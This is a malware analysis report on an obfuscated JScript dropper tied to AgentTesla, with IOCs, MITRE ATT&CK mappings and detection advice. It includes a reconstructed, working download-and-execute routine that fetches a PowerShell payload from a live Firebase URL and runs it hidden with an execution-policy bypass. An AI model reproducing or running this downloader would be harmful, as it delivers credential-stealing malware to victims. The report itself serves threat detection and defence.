highPhishing

AgentTesla JScript Dropper - Firebase-Staged PowerShell Downloader

PublishedMarch 12, 2026

phishingagentteslacredential-theftc2aptspearphishing

Executive Summary

This sample is a heavily obfuscated JScript/JavaScript dropper (WSH-compatible) that serves as the initial stage of an AgentTesla credential-stealing campaign. Upon execution via Windows Script Host (wscript.exe), the script downloads a second-stage PowerShell payload (SweetWhnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnore.ps1) from a Firebase Storage bucket (newmarch-a5a44.firebasestorage.app), drops it to C:\Temp\ under a randomly generated filename, and launches it with execution-policy bypass flags. The script employs sophisticated obfuscation including string array indirection, index-offset arithmetic, control-flow flattening, and an embedded ReDoS anti-debugging pattern. The use of legitimate Google Firebase infrastructure for payload staging is a common living-off-the-land network technique to evade domain-reputation and proxy controls. VirusTotal detection stands at 14/76 as of first submission, with Fortinet classifying it specifically as JS/Formbook.ADXY!tr.dldr.

Sample Metadata

Field	Value
SHA256	`54486b9aa0838dabeeedde892feb01d3ebb4fe2fb51135c000f066e2039787db`
MD5	`66fe9a16f2c5f0fc526e524b42757b0f`
SHA1	`778e6bed2e65f8294da30ba8ed50361da4c57a8c`
Filename	`66fe9a16f2c5f0fc526e524b42757b0f.js`
File Type	text/plain; JScript (WSH-compatible JavaScript)
File Size	26,362 bytes
VT Detections	14 / 76 (as of 2026-03-12)
First Seen	2026-03-12 15:48:44 UTC
Reporter	abuse_ch
Tags	AgentTesla, js

Static Analysis Findings

File Structure

The sample is a single-line, heavily obfuscated JScript file (no line terminators). It is compatible with Windows Script Host (wscript.exe / cscript.exe) and uses the legacy WSH ActiveX COM model.

Obfuscation Techniques

Technique	Description
String Array Obfuscation	All 365 string literals stored in central `n()` function returning array `XX[]`
Index Arithmetic	String lookup function `p(V,E)` uses `V - 0x172` as index into the string array
Multiple Lookup Functions	~50 aliased string-lookup variants (`ES`, `EW`, `EK`, `Ej`, `Eg`, etc.) all pointing to `p()`
Control Flow Flattening	Switch-case state machines with randomized case ordering (e.g., `'6\|1\|2\|3\|0'`, `'4\|2\|0\|3\|5'`)
IIFE Wrappers	Multiple self-invoking anonymous function closures
Anti-Debugging (ReDoS)	Embeds RegEx pattern `(((.+)+)+` — a known ReDoS canary used to detect debugger slow-down
Function Name Obfuscation	All identifiers use 1–2 character non-descriptive names
Dead Code / Junk	Spurious branching and unused variables interspersed throughout

Reconstructed Logic (Deobfuscated)

// === Stage 1: Configuration ===
var SOURCE_URL  = "https://firebasestorage.googleapis.com/v0/b/newmarch-a5a44.firebasestorage.app/o/SweetWhnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnore.ps1?alt=media&token=0a670e28-7885-4a73-9e48-3f22043f8f04";
var WORKING_PATH = "C:\\Temp\\";
var RETRY_LIMIT  = 2;  // 0x2

// === Stage 2: Object Instantiation ===
var xmlhttp = new ActiveXObject("MSXML2.XMLHTTP");     // HTTP download
var wshell  = new ActiveXObject("WScript.Shell");       // Command execution
var fso     = new ActiveXObject("Scripting.FileSystemObject"); // File I/O

// === Stage 3: Anti-Analysis Check ===
// Uses RegEx ReDoS pattern to detect debugging environment

// === Stage 4: Download & Drop ===
function downloadAndRun(url) {
    var filename = Math.random().toString(36).substring(2, 10) + ".ps1";
    var fullPath = WORKING_PATH + filename;

    xmlhttp.open("GET", url, false);
    xmlhttp.send();

    if (xmlhttp.status == 200) {
        if (!fso.FolderExists(WORKING_PATH)) {
            fso.CreateFolder(WORKING_PATH);
        }
        var outFile = fso.CreateTextFile(fullPath, true);
        outFile.Write(xmlhttp.responseText);
        outFile.Close();

        // === Stage 5: Execute with PowerShell bypass ===
        var cmd = ["powershell.exe", "-nop", "-ep", "bypass", "-file", '"' + fullPath + '"'].join(" ");
        wshell.Run(cmd, 0, true);   // windowStyle=0 (hidden), bWaitOnReturn=true
        return true;
    }
    return false;
}

Key String Fragments (from String Array)

Index	Value	Purpose
4	`MSXML2.XM`	XMLHTTP COM class prefix
108	`WScript.S`	WScript.Shell COM class prefix
74	`Scripting`	FileSystemObject COM class prefix
150	`https://firebasestorage.googleapis.com/...`	C2 download URL
66	`-nop`	PowerShell NoProfile flag
176	`bypass`	ExecutionPolicy bypass
277	`-file`	PowerShell -File parameter
97	`Run`	WScript.Shell.Run method
77	`(((.+)+)+`	ReDoS anti-debug pattern
178	`C:\Temp\`	Drop directory
327	`CreateFol`	CreateFolder method fragment

Behavioral Analysis (Static Inference)

Execution Chain

Email/Web → Victim opens .js → wscript.exe executes JScript
    → Anti-analysis check (ReDoS debugger detection)
    → MSXML2.XMLHTTP GET → Firebase Storage (HTTPS)
    → Write C:\Temp\<random>.ps1
    → WScript.Shell.Run(powershell.exe -nop -ep bypass -file C:\Temp\<random>.ps1, 0, true)
    → AgentTesla/Formbook payload executes
    → Credential theft / keylogging / exfiltration

Persistence / Evasion

Runs PowerShell window hidden (windowStyle=0)
Bypasses PowerShell execution policy (-ep bypass)
Uses Math.random().toString(36) for randomized PS1 filename to evade static filename IOCs
Leverages legitimate Google/Firebase CDN for payload hosting (bypasses URL reputation)
Single-line, no whitespace — evades pattern-based signature engines

Network Indicators

Type	Indicator	Notes
URL	`https://firebasestorage.googleapis.com/v0/b/newmarch-a5a44.firebasestorage.app/o/SweetWhnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnore.ps1?alt=media&token=0a670e28-7885-4a73-9e48-3f22043f8f04`	Second-stage PS1 download
Domain	`firebasestorage.googleapis.com`	Google Firebase (shared infrastructure)
Firebase Project	`newmarch-a5a44`	Attacker-controlled Firebase project
Storage Bucket	`newmarch-a5a44.firebasestorage.app`	Payload hosting bucket
Payload Filename	`SweetWhnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnore.ps1`	Second-stage PowerShell
Auth Token	`0a670e28-7885-4a73-9e48-3f22043f8f04`	Firebase access token
Protocol	HTTPS / TLS	Port 443

MITRE ATT&CK TTPs

Technique ID	Name	Details
T1566.001	Phishing: Spearphishing Attachment	Likely delivered via malicious email attachment (.js file)
T1059.007	Command and Scripting Interpreter: JavaScript	JScript executed via Windows Script Host
T1059.001	Command and Scripting Interpreter: PowerShell	Second-stage PS1 executed with bypass
T1105	Ingress Tool Transfer	Downloads PS1 payload from Firebase
T1027	Obfuscated Files or Information	365-entry string array with index arithmetic
T1027.010	Obfuscated Files or Information: Command Obfuscation	PowerShell flags obfuscated in string table
T1140	Deobfuscate/Decode Files or Information	Runtime string reconstruction
T1562.001	Impair Defenses: Disable or Modify Tools	`-ep bypass` disables PowerShell execution policy
T1036	Masquerading	Uses legitimate Google Firebase cloud storage as C2
T1071.001	Application Layer Protocol: Web Protocols	HTTPS for C2/payload delivery
T1102	Web Service	Abuses Firebase (Google Cloud) as staging infrastructure
T1564.003	Hide Artifacts: Hidden Window	PowerShell runs with `windowStyle=0` (hidden)
T1497	Virtualization/Sandbox Evasion	ReDoS anti-debugging technique

IOCs

File Indicators

Type	Value	Description
SHA256	`54486b9aa0838dabeeedde892feb01d3ebb4fe2fb51135c000f066e2039787db`	JScript dropper
MD5	`66fe9a16f2c5f0fc526e524b42757b0f`	JScript dropper
SHA1	`778e6bed2e65f8294da30ba8ed50361da4c57a8c`	JScript dropper
File path	`C:\Temp\[a-z0-9]{8}\.ps1`	Dropped PowerShell payload

Network Indicators

Type	Value	Description
URL	`https://firebasestorage.googleapis.com/v0/b/newmarch-a5a44.firebasestorage.app/o/SweetWhnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnore.ps1?alt=media&token=0a670e28-7885-4a73-9e48-3f22043f8f04`	Payload download URL
Domain	`firebasestorage.googleapis.com`	Payload hosting (shared)
Firebase Project	`newmarch-a5a44`	Attacker-controlled project
Auth Token	`0a670e28-7885-4a73-9e48-3f22043f8f04`	Firebase storage access token

Behavioral / Registry Indicators

Type	Value	Description
Process	`wscript.exe → powershell.exe`	Parent-child process chain
PowerShell flags	`-nop -ep bypass -file`	Execution policy bypass pattern
Directory creation	`C:\Temp\`	Drop directory

Campaign Context & Attribution

Malware Family: AgentTesla (confirmed by abuse_ch tags, Fortinet detection JS/Formbook.ADXY!tr.dldr, Rising Trojan.PSRunner/JS)
Attack Vector: Likely phishing email with .js attachment (common AgentTesla delivery vector)
Infrastructure: Attacker created Firebase project newmarch-a5a44 for payload staging — a growing trend in commodity malware campaigns to abuse free cloud storage (Firebase, Dropbox, OneDrive, Pastebin) to bypass URL filtering
Payload: The second-stage SweetWhnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnore.ps1 is consistent with AgentTesla PS1 loaders that typically download and execute the final .NET AgentTesla binary, which performs keylogging, screenshot capture, credential theft from browsers/email clients, and exfiltrates via SMTP/FTP
Attribution: No specific threat actor attributed; campaign consistent with commodity cybercrime (AgentTesla is widely available as MaaS)
Obfuscation Tool: The obfuscation pattern (string array + index arithmetic + IIFE wrappers) is characteristic of obfuscator.io or similar JavaScript obfuscation services commonly used in JS dropper campaigns

Detection Recommendations

Endpoint Detection

Block wscript.exe executing .js files from user-writable locations (email attachments, downloads)
Alert on wscript.exe → powershell.exe parent-child process chains
Monitor for PowerShell launched with -ep bypass -nop -file flags
Alert on file creation matching C:\Temp\[a-z0-9]+\.ps1
Application control: Restrict WSH (Windows Script Host) for non-administrative users

Network Detection

Alert on HTTPS connections to firebasestorage.googleapis.com from wscript.exe or powershell.exe processes
DNS monitoring: Alert on firebasestorage.googleapis.com lookups from process trees involving WSH
DLP: Block outbound connections from wscript.exe entirely via host firewall policy
See suricata.rules for network signatures

YARA / Signature Detection

See yara_rules.yar for static detection signatures targeting the string array pattern and Firebase URL
Key signature: presence of SweetWh + firebasestorage + MSXML2.XM + WScript.S + bypass

References

VirusTotal: 54486b9aa0838dabeeedde892feb01d3ebb4fe2fb51135c000f066e2039787db
MalwareBazaar: https://bazaar.abuse.ch/
MITRE ATT&CK: https://attack.mitre.org/software/S0331/ (AgentTesla)
Fortinet: JS/Formbook.ADXY!tr.dldr
DrWeb: JS.DownLoader.9473